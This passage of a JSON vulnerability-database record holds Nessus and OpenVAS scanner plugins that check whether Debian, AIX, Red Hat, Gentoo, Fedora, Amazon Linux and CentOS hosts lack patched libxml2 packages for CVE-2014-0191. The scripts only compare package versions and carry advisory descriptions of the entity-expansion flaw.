["p-cpe:/a:debian:debian_linux:libxml2", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-2978.NASL", "href": "https://www.tenable.com/plugins/nessus/76499", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2978. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76499);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-0191\");\n script_bugtraq_id(67233);\n script_xref(name:\"DSA\", value:\"2978\");\n\n script_name(english:\"Debian DSA-2978-1 : libxml2 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Daniel P. Berrange discovered a denial of service vulnerability in\nlibxml2 entity substitution.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/libxml2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2014/dsa-2978\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the libxml2 packages.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 2.8.0+dfsg1-7+wheezy1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"libxml2\", reference:\"2.8.0+dfsg1-7+wheezy1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libxml2-dbg\", reference:\"2.8.0+dfsg1-7+wheezy1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libxml2-dev\", reference:\"2.8.0+dfsg1-7+wheezy1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libxml2-doc\", reference:\"2.8.0+dfsg1-7+wheezy1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libxml2-utils\", reference:\"2.8.0+dfsg1-7+wheezy1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libxml2-utils-dbg\", reference:\"2.8.0+dfsg1-7+wheezy1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"python-libxml2\", reference:\"2.8.0+dfsg1-7+wheezy1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"python-libxml2-dbg\", reference:\"2.8.0+dfsg1-7+wheezy1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-06T09:18:27", "description": "The remote host is missing AIX PTF U862099, which is related to the\nsecurity of the package bos.rte.control.\n\nLibxml2 is vulnerable to a denial of service, caused by the expansion\nof internal entities within the xmlParserHandlePEReference().", "edition": 23, "published": "2014-11-10T00:00:00", "title": "AIX 7.1 TL 3 : bos.rte.control (U862099)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "modified": "2014-11-10T00:00:00", "cpe": ["cpe:/o:ibm:aix:7.1"], "id": "AIX_U862099.NASL", "href": "https://www.tenable.com/plugins/nessus/79063", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were extracted\n# from AIX Security PTF U862099. The text itself is copyright (C)\n# International Business Machines Corp.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79063);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2014-0191\");\n\n script_name(english:\"AIX 7.1 TL 3 : bos.rte.control (U862099)\");\n script_summary(english:\"Check for PTF U862099\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is missing AIX PTF U862099, which is related to the\nsecurity of the package bos.rte.control.\n\nLibxml2 is vulnerable to a denial of service, caused by the expansion\nof internal entities within the xmlParserHandlePEReference().\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www-01.ibm.com/support/docview.wss?uid=isg1IV62450\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate missing security-related fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:7.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AIX/oslevel\", \"Host/AIX/version\", \"Host/AIX/lslpp\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nflag = 0;\n\nif ( aix_check_patch(ml:\"710003\", patch:\"U862099\", package:\"bos.rte.control.7.1.3.30\") < 0 ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:37:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "description": "Daniel P. Berrange discovered a denial of service vulnerability in\nlibxml2 entity substitution.", "modified": "2019-03-19T00:00:00", "published": "2014-07-11T00:00:00", "id": "OPENVAS:1361412562310702978", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310702978", "type": "openvas", "title": "Debian Security Advisory DSA 2978-1 (libxml2 - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2978.nasl 14302 2019-03-19 08:28:48Z cfischer $\n# Auto-generated from advisory DSA 2978-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.702978\");\n script_version(\"$Revision: 14302 $\");\n script_cve_id(\"CVE-2014-0191\");\n script_name(\"Debian Security Advisory DSA 2978-1 (libxml2 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-19 09:28:48 +0100 (Tue, 19 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-11 00:00:00 +0200 (Fri, 11 Jul 2014)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2014/dsa-2978.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"libxml2 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (wheezy), this problem has been fixed in\nversion 2.8.0+dfsg1-7+wheezy1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.9.1+dfsg1-4.\n\nWe recommend that you upgrade your libxml2 packages.\");\n script_tag(name:\"summary\", value:\"Daniel P. Berrange discovered a denial of service vulnerability in\nlibxml2 entity substitution.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libxml2\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-dbg\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-dev\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-doc\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-utils\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-utils-dbg\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-libxml2\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-libxml2-dbg\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:37:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2015-03-31T00:00:00", "id": "OPENVAS:1361412562310871346", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871346", "type": "openvas", "title": "RedHat Update for libxml2 RHSA-2015:0749-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for libxml2 RHSA-2015:0749-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871346\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-03-31 07:09:15 +0200 (Tue, 31 Mar 2015)\");\n script_cve_id(\"CVE-2014-0191\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for libxml2 RHSA-2015:0749-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libxml2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The libxml2 library is a development toolbox providing the implementation\nof various XML standards.\n\nIt was discovered that libxml2 loaded external parameter entities even when\nentity substitution was disabled. A remote attacker able to provide a\nspecially crafted XML file to an application linked against libxml2 could\nuse this flaw to conduct XML External Entity (XXE) attacks, possibly\nresulting in a denial of service or an information leak on the system.\n(CVE-2014-0191)\n\nThe CVE-2014-0191 issue was discovered by Daniel P. Berrange of Red Hat.\n\nAll libxml2 users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. The desktop must be\nrestarted (log out, then log back in) for this update to take effect.\");\n script_tag(name:\"affected\", value:\"libxml2 on Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:0749-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-March/msg00054.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.9.1~5.el7_1.2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-debuginfo\", rpm:\"libxml2-debuginfo~2.9.1~5.el7_1.2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-devel\", rpm:\"libxml2-devel~2.9.1~5.el7_1.2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-python\", rpm:\"libxml2-python~2.9.1~5.el7_1.2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:36:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "description": "Gentoo Linux Local Security Checks GLSA 201409-08", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121271", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121271", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201409-08", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201409-08.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121271\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:27:54 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201409-08\");\n script_tag(name:\"insight\", value:\"A vulnerability in the xmlParserHandlePEReference() function of parser.c, when expanding entity references, can be exploited to consume large amounts of memory and cause a crash or hang.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201409-08\");\n script_cve_id(\"CVE-2014-0191\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201409-08\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"dev-libs/libxml2\", unaffected: make_list(\"ge 2.9.1-r4\"), vulnerable: make_list(\"lt 2.9.1-r4\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:36:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2015-01-05T00:00:00", "id": "OPENVAS:1361412562310868769", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868769", "type": "openvas", "title": "Fedora Update for mingw-libxml2 FEDORA-2014-17573", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mingw-libxml2 FEDORA-2014-17573\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868769\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-05 14:50:49 +0100 (Mon, 05 Jan 2015)\");\n script_cve_id(\"CVE-2014-0191\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for mingw-libxml2 FEDORA-2014-17573\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mingw-libxml2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mingw-libxml2 on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2014-17573\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-January/147322.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mingw-libxml2\", rpm:\"mingw-libxml2~2.9.2~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-03-17T23:00:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120474", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120474", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2014-341)", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120474\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:27:15 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2014-341)\");\n script_tag(name:\"insight\", value:\"It was discovered that libxml2, a library providing support to read, modify and write XML files, incorrectly performs entity substituton in the doctype prolog, even if the application using libxml2 disabled any entity substitution. A remote attacker could provide a specially-crafted XML file that, when processed, would lead to the exhaustion of CPU and memory resources or file descriptors.\");\n script_tag(name:\"solution\", value:\"Run yum update libxml2 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-341.html\");\n script_cve_id(\"CVE-2014-0191\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"libxml2-debuginfo\", rpm:\"libxml2-debuginfo~2.9.1~1.1.30.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libxml2-python\", rpm:\"libxml2-python~2.9.1~1.1.30.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.9.1~1.1.30.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libxml2-devel\", rpm:\"libxml2-devel~2.9.1~1.1.30.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libxml2-static\", rpm:\"libxml2-static~2.9.1~1.1.30.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:36:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "description": "Check the version of libxml2", "modified": "2019-03-08T00:00:00", "published": "2015-04-01T00:00:00", "id": "OPENVAS:1361412562310882149", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882149", "type": "openvas", "title": "CentOS Update for libxml2 CESA-2015:0749 centos7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for libxml2 CESA-2015:0749 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882149\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-04-01 07:25:04 +0200 (Wed, 01 Apr 2015)\");\n script_cve_id(\"CVE-2014-0191\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for libxml2 CESA-2015:0749 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of libxml2\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n 